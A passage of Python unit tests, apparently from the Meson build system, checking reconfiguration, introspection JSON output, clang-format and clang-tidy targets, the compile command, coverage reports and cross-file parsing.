Path(self.builddir): self.init(testdir, extra_args=['--wipe']) def test_minor_version_does_not_reconfigure_wipe(self): testdir = os.path.join(self.unit_test_dir, '48 reconfigure') self.init(testdir, extra_args=['-Dopt1=val1']) self.setconf('-Dopt2=val2') self.__reconfigure(change_minor=True) out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3']) self.assertNotRegex(out, 'Regenerating configuration from scratch') self.assertRegex(out, 'opt1 val1') self.assertRegex(out, 'opt2 val2') self.assertRegex(out, 'opt3 val3') self.assertRegex(out, 'opt4 default4') self.build() self.run_tests() def test_target_construct_id_from_path(self): # This id is stable but not guessable. # The test is supposed to prevent unintentional # changes of target ID generation. target_id = Target.construct_id_from_path('some/obscure/subdir', 'target-id', '@suffix') self.assertEqual('5e002d3@@target-id@suffix', target_id) target_id = Target.construct_id_from_path('subproject/foo/subdir/bar', 'target2-id', '@other') self.assertEqual('81d46d1@@target2-id@other', target_id) def test_introspect_projectinfo_without_configured_build(self): testfile = os.path.join(self.common_test_dir, '34 run program', 'meson.build') res = self.introspect_directory(testfile, '--projectinfo') self.assertEqual(set(res['buildsystem_files']), set(['meson.build'])) self.assertEqual(res['version'], 'undefined') self.assertEqual(res['descriptive_name'], 'run command') self.assertEqual(res['subprojects'], []) testfile = os.path.join(self.common_test_dir, '41 options', 'meson.build') res = self.introspect_directory(testfile, '--projectinfo') self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build'])) self.assertEqual(res['version'], 'undefined') self.assertEqual(res['descriptive_name'], 'options') self.assertEqual(res['subprojects'], []) testfile = os.path.join(self.common_test_dir, '44 subproject options', 'meson.build') res = self.introspect_directory(testfile, '--projectinfo') self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build'])) self.assertEqual(res['version'], 'undefined') self.assertEqual(res['descriptive_name'], 'suboptions') self.assertEqual(len(res['subprojects']), 1) subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files']) self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build'])) self.assertEqual(res['subprojects'][0]['name'], 'subproject') self.assertEqual(res['subprojects'][0]['version'], 'undefined') self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject') def test_introspect_projectinfo_subprojects(self): testdir = os.path.join(self.common_test_dir, '99 subproject subdir') self.init(testdir) res = self.introspect('--projectinfo') expected = { 'descriptive_name': 'proj', 'version': 'undefined', 'subproject_dir': 'subprojects', 'subprojects': [ { 'descriptive_name': 'sub', 'name': 'sub', 'version': '1.0' }, { 'descriptive_name': 'sub_implicit', 'name': 'sub_implicit', 'version': '1.0', }, { 'descriptive_name': 'sub-novar', 'name': 'sub_novar', 'version': '1.0', }, { 'descriptive_name': 'subsub', 'name': 'subsub', 'version': 'undefined' }, { 'descriptive_name': 'subsubsub', 'name': 'subsubsub', 'version': 'undefined' }, ] } res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name']) self.assertDictEqual(expected, res) def test_introspection_target_subproject(self): testdir = os.path.join(self.common_test_dir, '43 subproject') 
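        # Targets coming from the subproject should report 'sublib' as their
        # subproject, while the top-level 'user' target reports None (see `expected`).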
self.init(testdir) res = self.introspect('--targets') expected = { 'sublib': 'sublib', 'simpletest': 'sublib', 'user': None } for entry in res: name = entry['name'] self.assertEqual(entry['subproject'], expected[name]) def test_introspect_projectinfo_subproject_dir(self): testdir = os.path.join(self.common_test_dir, '76 custom subproject dir') self.init(testdir) res = self.introspect('--projectinfo') self.assertEqual(res['subproject_dir'], 'custom_subproject_dir') def test_introspect_projectinfo_subproject_dir_from_source(self): testfile = os.path.join(self.common_test_dir, '76 custom subproject dir', 'meson.build') res = self.introspect_directory(testfile, '--projectinfo') self.assertEqual(res['subproject_dir'], 'custom_subproject_dir') @skipIfNoExecutable('clang-format') def test_clang_format(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name)) testdir = os.path.join(self.unit_test_dir, '54 clang-format') testfile = os.path.join(testdir, 'prog.c') badfile = os.path.join(testdir, 'prog_orig_c') goodfile = os.path.join(testdir, 'prog_expected_c') testheader = os.path.join(testdir, 'header.h') badheader = os.path.join(testdir, 'header_orig_h') goodheader = os.path.join(testdir, 'header_expected_h') try: shutil.copyfile(badfile, testfile) shutil.copyfile(badheader, testheader) self.init(testdir) self.assertNotEqual(Path(testfile).read_text(), Path(goodfile).read_text()) self.assertNotEqual(Path(testheader).read_text(), Path(goodheader).read_text()) self.run_target('clang-format') self.assertEqual(Path(testheader).read_text(), Path(goodheader).read_text()) finally: if os.path.exists(testfile): os.unlink(testfile) if os.path.exists(testheader): os.unlink(testheader) @skipIfNoExecutable('clang-tidy') def test_clang_tidy(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name)) if shutil.which('c++') is None: raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.') if is_osx(): raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.') testdir = os.path.join(self.unit_test_dir, '70 clang-tidy') dummydir = os.path.join(testdir, 'dummydir.h') self.init(testdir, override_envvars={'CXX': 'c++'}) out = self.run_target('clang-tidy') self.assertIn('cttest.cpp:4:20', out) self.assertNotIn(dummydir, out) def test_identity_cross(self): testdir = os.path.join(self.unit_test_dir, '71 cross') # Do a build to generate a cross file where the host is this target self.init(testdir, extra_args=['-Dgenerate=true']) self.meson_cross_file = os.path.join(self.builddir, "crossfile") self.assertTrue(os.path.exists(self.meson_cross_file)) # Now verify that this is detected as cross self.new_builddir() self.init(testdir) def test_introspect_buildoptions_without_configured_build(self): testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions') testfile = os.path.join(testdir, 'meson.build') res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args) self.init(testdir, default_args=False) res_wb = self.introspect('--buildoptions') self.maxDiff = None self.assertListEqual(res_nb, res_wb) def test_meson_configure_from_source_does_not_crash(self): testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions') self._run(self.mconf_command + [testdir]) def test_introspect_buildoptions_cross_only(self): testdir = 
os.path.join(self.unit_test_dir, '84 cross only introspect') testfile = os.path.join(testdir, 'meson.build') res = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args) optnames = [o['name'] for o in res] self.assertIn('c_args', optnames) self.assertNotIn('build.c_args', optnames) def test_introspect_json_dump(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') self.init(testdir) infodir = os.path.join(self.builddir, 'meson-info') self.assertPathExists(infodir) def assertKeyTypes(key_type_list, obj, strict: bool = True): for i in key_type_list: if isinstance(i[1], (list, tuple)) and None in i[1]: i = (i[0], tuple([x for x in i[1] if x is not None])) if i[0] not in obj or obj[i[0]] is None: continue self.assertIn(i[0], obj) self.assertIsInstance(obj[i[0]], i[1]) if strict: for k in obj.keys(): found = False for i in key_type_list: if k == i[0]: found = True break self.assertTrue(found, 'Key "{}" not in expected list'.format(k)) root_keylist = [ ('benchmarks', list), ('buildoptions', list), ('buildsystem_files', list), ('dependencies', list), ('installed', dict), ('projectinfo', dict), ('targets', list), ('tests', list), ] test_keylist = [ ('cmd', list), ('env', dict), ('name', str), ('timeout', int), ('suite', list), ('is_parallel', bool), ('protocol', str), ('depends', list), ('workdir', (str, None)), ('priority', int), ] buildoptions_keylist = [ ('name', str), ('section', str), ('type', str), ('description', str), ('machine', str), ('choices', (list, None)), ('value', (str, int, bool, list)), ] buildoptions_typelist = [ ('combo', str, [('choices', list)]), ('string', str, []), ('boolean', bool, []), ('integer', int, []), ('array', list, []), ] buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test'] buildoptions_machines = ['any', 'build', 'host'] dependencies_typelist = [ ('name', str), ('version', str), ('compile_args', list), ('link_args', list), ] targets_typelist = [ ('name', str), ('id', str), ('type', str), ('defined_in', str), ('filename', list), ('build_by_default', bool), ('target_sources', list), ('extra_files', list), ('subproject', (str, None)), ('install_filename', (list, None)), ('installed', bool), ] targets_sources_typelist = [ ('language', str), ('compiler', list), ('parameters', list), ('sources', list), ('generated_sources', list), ] # First load all files res = {} for i in root_keylist: curr = os.path.join(infodir, 'intro-{}.json'.format(i[0])) self.assertPathExists(curr) with open(curr, 'r') as fp: res[i[0]] = json.load(fp) assertKeyTypes(root_keylist, res) # Match target ids to input and output files for ease of reference src_to_id = {} out_to_id = {} for i in res['targets']: print(json.dump(i, sys.stdout)) out_to_id.update({os.path.relpath(out, self.builddir): i['id'] for out in i['filename']}) for group in i['target_sources']: src_to_id.update({os.path.relpath(src, testdir): i['id'] for src in group['sources']}) # Check Tests and benchmarks tests_to_find = ['test case 1', 'test case 2', 'benchmark 1'] deps_to_find = {'test case 1': [src_to_id['t1.cpp']], 'test case 2': [src_to_id['t2.cpp'], src_to_id['t3.cpp']], 'benchmark 1': [out_to_id['file2'], src_to_id['t3.cpp']]} for i in res['benchmarks'] + res['tests']: assertKeyTypes(test_keylist, i) if i['name'] in tests_to_find: tests_to_find.remove(i['name']) self.assertEqual(sorted(i['depends']), sorted(deps_to_find[i['name']])) self.assertListEqual(tests_to_find, []) # Check buildoptions buildopts_to_find = {'cpp_std': 'c++11'} for i in 
res['buildoptions']: assertKeyTypes(buildoptions_keylist, i) valid_type = False for j in buildoptions_typelist: if i['type'] == j[0]: self.assertIsInstance(i['value'], j[1]) assertKeyTypes(j[2], i, strict=False) valid_type = True break self.assertIn(i['section'], buildoptions_sections) self.assertIn(i['machine'], buildoptions_machines) self.assertTrue(valid_type) if i['name'] in buildopts_to_find: self.assertEqual(i['value'], buildopts_to_find[i['name']]) buildopts_to_find.pop(i['name'], None) self.assertDictEqual(buildopts_to_find, {}) # Check buildsystem_files bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build'] bs_files = [os.path.join(testdir, x) for x in bs_files] self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files))) # Check dependencies dependencies_to_find = ['threads'] for i in res['dependencies']: assertKeyTypes(dependencies_typelist, i) if i['name'] in dependencies_to_find: dependencies_to_find.remove(i['name']) self.assertListEqual(dependencies_to_find, []) # Check projectinfo self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []}) # Check targets targets_to_find = { 'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'), 'staticTestLib': ('static library', True, False, 'staticlib/meson.build'), 'test1': ('executable', True, True, 'meson.build'), 'test2': ('executable', True, False, 'meson.build'), 'test3': ('executable', True, False, 'meson.build'), } for i in res['targets']: assertKeyTypes(targets_typelist, i) if i['name'] in targets_to_find: tgt = targets_to_find[i['name']] self.assertEqual(i['type'], tgt[0]) self.assertEqual(i['build_by_default'], tgt[1]) self.assertEqual(i['installed'], tgt[2]) self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3])) targets_to_find.pop(i['name'], None) for j in i['target_sources']: assertKeyTypes(targets_sources_typelist, j) self.assertDictEqual(targets_to_find, {}) def test_introspect_file_dump_equals_all(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') self.init(testdir) res_all = self.introspect('--all') res_file = {} root_keylist = [ 'benchmarks', 'buildoptions', 'buildsystem_files', 'dependencies', 'installed', 'projectinfo', 'targets', 'tests', ] infodir = os.path.join(self.builddir, 'meson-info') self.assertPathExists(infodir) for i in root_keylist: curr = os.path.join(infodir, 'intro-{}.json'.format(i)) self.assertPathExists(curr) with open(curr, 'r') as fp: res_file[i] = json.load(fp) self.assertEqual(res_all, res_file) def test_introspect_meson_info(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json') self.init(testdir) self.assertPathExists(introfile) with open(introfile, 'r') as fp: res1 = json.load(fp) for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']: self.assertIn(i, res1) self.assertEqual(res1['error'], False) self.assertEqual(res1['build_files_updated'], True) def test_introspect_config_update(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json') self.init(testdir) self.assertPathExists(introfile) with open(introfile, 'r') as fp: res1 = json.load(fp) self.setconf('-Dcpp_std=c++14') self.setconf('-Dbuildtype=release') for idx, i in enumerate(res1): if i['name'] == 'cpp_std': 
res1[idx]['value'] = 'c++14' if i['name'] == 'build.cpp_std': res1[idx]['value'] = 'c++14' if i['name'] == 'buildtype': res1[idx]['value'] = 'release' if i['name'] == 'optimization': res1[idx]['value'] = '3' if i['name'] == 'debug': res1[idx]['value'] = False with open(introfile, 'r') as fp: res2 = json.load(fp) self.assertListEqual(res1, res2) def test_introspect_targets_from_source(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') testfile = os.path.join(testdir, 'meson.build') introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json') self.init(testdir) self.assertPathExists(introfile) with open(introfile, 'r') as fp: res_wb = json.load(fp) res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args) # Account for differences in output res_wb = [i for i in res_wb if i['type'] != 'custom'] for i in res_wb: i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']] if 'install_filename' in i: del i['install_filename'] sources = [] for j in i['target_sources']: sources += j['sources'] i['target_sources'] = [{ 'language': 'unknown', 'compiler': [], 'parameters': [], 'sources': sources, 'generated_sources': [] }] self.maxDiff = None self.assertListEqual(res_nb, res_wb) def test_introspect_ast_source(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') testfile = os.path.join(testdir, 'meson.build') res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args) node_counter = {} def accept_node(json_node): self.assertIsInstance(json_node, dict) for i in ['lineno', 'colno', 'end_lineno', 'end_colno']: self.assertIn(i, json_node) self.assertIsInstance(json_node[i], int) self.assertIn('node', json_node) n = json_node['node'] self.assertIsInstance(n, str) self.assertIn(n, nodes) if n not in node_counter: node_counter[n] = 0 node_counter[n] = node_counter[n] + 1 for nodeDesc in nodes[n]: key = nodeDesc[0] func = nodeDesc[1] self.assertIn(key, json_node) if func is None: tp = nodeDesc[2] self.assertIsInstance(json_node[key], tp) continue func(json_node[key]) def accept_node_list(node_list): self.assertIsInstance(node_list, list) for i in node_list: accept_node(i) def accept_kwargs(kwargs): self.assertIsInstance(kwargs, list) for i in kwargs: self.assertIn('key', i) self.assertIn('val', i) accept_node(i['key']) accept_node(i['val']) nodes = { 'BooleanNode': [('value', None, bool)], 'IdNode': [('value', None, str)], 'NumberNode': [('value', None, int)], 'StringNode': [('value', None, str)], 'ContinueNode': [], 'BreakNode': [], 'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)], 'ArrayNode': [('args', accept_node)], 'DictNode': [('args', accept_node)], 'EmptyNode': [], 'OrNode': [('left', accept_node), ('right', accept_node)], 'AndNode': [('left', accept_node), ('right', accept_node)], 'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)], 'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)], 'NotNode': [('right', accept_node)], 'CodeBlockNode': [('lines', accept_node_list)], 'IndexNode': [('object', accept_node), ('index', accept_node)], 'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)], 'FunctionNode': [('args', accept_node), ('name', None, str)], 'AssignmentNode': [('value', accept_node), ('var_name', None, str)], 'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)], 'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, 
list)], 'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)], 'IfNode': [('condition', accept_node), ('block', accept_node)], 'UMinusNode': [('right', accept_node)], 'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)], } accept_node(res_nb) for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]: self.assertIn(n, node_counter) self.assertEqual(node_counter[n], c) def test_introspect_dependencies_from_source(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') testfile = os.path.join(testdir, 'meson.build') res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args) expected = [ { 'name': 'threads', 'required': True, 'version': [], 'has_fallback': False, 'conditional': False }, { 'name': 'zlib', 'required': False, 'version': [], 'has_fallback': False, 'conditional': False }, { 'name': 'bugDep1', 'required': True, 'version': [], 'has_fallback': False, 'conditional': False }, { 'name': 'somethingthatdoesnotexist', 'required': True, 'version': ['>=1.2.3'], 'has_fallback': False, 'conditional': True }, { 'name': 'look_i_have_a_fallback', 'required': True, 'version': ['>=1.0.0', '<=99.9.9'], 'has_fallback': True, 'conditional': True } ] self.maxDiff = None self.assertListEqual(res_nb, expected) def test_unstable_coredata(self): testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) # just test that the command does not fail (e.g. because it throws an exception) self._run([*self.meson_command, 'unstable-coredata', self.builddir]) @skip_if_no_cmake def test_cmake_prefix_path(self): testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path') self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')]) @skip_if_no_cmake def test_cmake_parser(self): testdir = os.path.join(self.unit_test_dir, '65 cmake parser') self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')]) def test_alias_target(self): if self.backend is Backend.vs: # FIXME: This unit test is broken with vs backend, needs investigation raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name)) testdir = os.path.join(self.unit_test_dir, '66 alias target') self.init(testdir) self.build() self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix)) self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt')) self.run_target('build-all') self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix)) self.assertPathExists(os.path.join(self.builddir, 'hello.txt')) def test_configure(self): testdir = os.path.join(self.common_test_dir, '2 cpp') self.init(testdir) self._run(self.mconf_command + [self.builddir]) def test_summary(self): testdir = os.path.join(self.unit_test_dir, '73 summary') out = self.init(testdir) expected = textwrap.dedent(r''' Some Subproject 2.0 string: bar integer: 1 boolean: True My Project 1.0 Configuration Some boolean: False Another boolean: True Some string: Hello World A list: string 1 True empty list: A number: 1 yes: YES no: NO coma list: a, b, c Plugins long coma list: alpha, alphacolor, apetag, audiofx, audioparsers, auparse, autodetect, avi Subprojects sub: YES sub2: NO Problem encountered: This subproject failed ''') expected_lines = expected.split('\n')[1:] out_start = out.find(expected_lines[0]) out_lines = out[out_start:].split('\n')[:len(expected_lines)] if sys.version_info < (3, 7, 0): # Dictionary order is not stable in Python <3.7, so sort 
the lines # while comparing self.assertEqual(sorted(expected_lines), sorted(out_lines)) else: self.assertEqual(expected_lines, out_lines) def test_meson_compile(self): """Test the meson compile command.""" def get_exe_name(basename: str) -> str: if is_windows(): return '{}.exe'.format(basename) else: return basename def get_shared_lib_name(basename: str) -> str: if mesonbuild.environment.detect_msys2_arch(): return 'lib{}.dll'.format(basename) elif is_windows(): return '{}.dll'.format(basename) elif is_cygwin(): return 'cyg{}.dll'.format(basename) elif is_osx(): return 'lib{}.dylib'.format(basename) else: return 'lib{}.so'.format(basename) def get_static_lib_name(basename: str) -> str: return 'lib{}.a'.format(basename) # Base case (no targets or additional arguments) testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) self._run([*self.meson_command, 'compile', '-C', self.builddir]) self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog'))) # `--clean` self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean']) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog'))) # Target specified in a project with unique names testdir = os.path.join(self.common_test_dir, '6 linkshared') self.init(testdir, extra_args=['--wipe']) # Multiple targets and target type specified self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library']) # Check that we have a shared lib, but not an executable, i.e. check that target actually worked self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib'))) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog'))) self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib'))) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog'))) # Target specified in a project with non unique names testdir = os.path.join(self.common_test_dir, '186 same target name') self.init(testdir, extra_args=['--wipe']) self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo']) self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo'))) self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo']) self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo'))) # run_target testdir = os.path.join(self.common_test_dir, '52 run target') self.init(testdir, extra_args=['--wipe']) out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi']) self.assertIn('I am Python3.', out) # `--$BACKEND-args` testdir = os.path.join(self.common_test_dir, '1 trivial') if self.backend is Backend.ninja: self.init(testdir, extra_args=['--wipe']) # Dry run - should not create a program self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n']) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog'))) elif self.backend is Backend.vs: self.init(testdir, extra_args=['--wipe']) self._run([*self.meson_command, 'compile', '-C', self.builddir]) # Explicitly clean the target through msbuild interface self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))]) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog'))) def test_spurious_reconfigure_built_dep_file(self): testdir = os.path.join(self.unit_test_dir, '75 dep files') # Regression test: 
Spurious reconfigure was happening when build # directory is inside source directory. # See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85. srcdir = os.path.join(self.builddir, 'srctree') shutil.copytree(testdir, srcdir) builddir = os.path.join(srcdir, '_build') self.change_builddir(builddir) self.init(srcdir) self.build() # During first configure the file did not exist so no dependency should # have been set. A rebuild should not trigger a reconfigure. self.clean() out = self.build() self.assertNotIn('Project configured', out) self.init(srcdir, extra_args=['--reconfigure']) # During the reconfigure the file did exist, but is inside build # directory, so no dependency should have been set. A rebuild should not # trigger a reconfigure. self.clean() out = self.build() self.assertNotIn('Project configured', out) def _test_junit(self, case: str) -> None: try: import lxml.etree as et except ImportError: raise unittest.SkipTest('lxml required, but not found.') schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd'))) self.init(case) self.run_tests() junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml')) try: schema.assertValid(junit) except et.DocumentInvalid as e: self.fail(e.error_log) def test_junit_valid_tap(self): self._test_junit(os.path.join(self.common_test_dir, '207 tap tests')) def test_junit_valid_exitcode(self): self._test_junit(os.path.join(self.common_test_dir, '42 test args')) def test_junit_valid_gtest(self): self._test_junit(os.path.join(self.framework_test_dir, '2 gtest')) def test_link_language_linker(self): # TODO: there should be some way to query how we're linking things # without resorting to reading the ninja.build file if self.backend is not Backend.ninja: raise unittest.SkipTest('This test reads the ninja file') testdir = os.path.join(self.common_test_dir, '226 link language') self.init(testdir) build_ninja = os.path.join(self.builddir, 'build.ninja') with open(build_ninja, 'r', encoding='utf-8') as f: contents = f.read() self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER') self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER') def test_commands_documented(self): ''' Test that all listed meson commands are documented in Commands.md. ''' # The docs directory is not in release tarballs. if not os.path.isdir('docs'): raise unittest.SkipTest('Doc directory does not exist.') doc_path = 'docs/markdown_dynamic/Commands.md' md = None with open(doc_path, encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) ## Get command sections section_pattern = re.compile(r'^### (.+)$', re.MULTILINE) md_command_section_matches = [i for i in section_pattern.finditer(md)] md_command_sections = dict() for i, s in enumerate(md_command_section_matches): section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start() md_command_sections[s.group(1)] = (s.start(), section_end) ## Validate commands md_commands = set(k for k,v in md_command_sections.items()) help_output = self._run(self.meson_command + ['--help']) help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(',')) self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path)) ## Validate that each section has proper placeholders def get_data_pattern(command): return re.compile( r'^```[\r\n]' r'{{ cmd_help\[\'' + command + r'\'\]\[\'usage\'\] }}[\r\n]' r'^```[\r\n]' r'.*?' 
r'^```[\r\n]' r'{{ cmd_help\[\'' + command + r'\'\]\[\'arguments\'\] }}[\r\n]' r'^```', flags = re.MULTILINE|re.DOTALL) for command in md_commands: m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1]) self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path)) def _check_coverage_files(self, types=('text', 'xml', 'html')): covdir = Path(self.builddir) / 'meson-logs' files = [] if 'text' in types: files.append('coverage.txt') if 'xml' in types: files.append('coverage.xml') if 'html' in types: files.append('coveragereport/index.html') for f in files: self.assertTrue((covdir / f).is_file(), msg='{} is not a file'.format(f)) def test_coverage(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage') self._check_coverage_files() def test_coverage_complex(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '106 generatorcustom') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage') self._check_coverage_files() def test_coverage_html(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage-html') self._check_coverage_files(['html']) def test_coverage_text(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '1 
trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage-text') self._check_coverage_files(['text']) def test_coverage_xml(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage-xml') self._check_coverage_files(['xml']) def test_cross_file_constants(self): with temp_filename() as crossfile1, temp_filename() as crossfile2: with open(crossfile1, 'w') as f: f.write(textwrap.dedent( ''' [constants] compiler = 'gcc' ''')) with open(crossfile2, 'w') as f: f.write(textwrap.dedent( ''' [constants] toolchain = '/toolchain/' common_flags = ['--sysroot=' + toolchain / 'sysroot'] [properties] c_args = common_flags + ['-DSOMETHING'] cpp_args = c_args + ['-DSOMETHING_ELSE'] [binaries] c = toolchain / compiler ''')) values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2]) self.assertEqual(values['binaries']['c'], '/toolchain/gcc') self.assertEqual(values['properties']['c_args'], 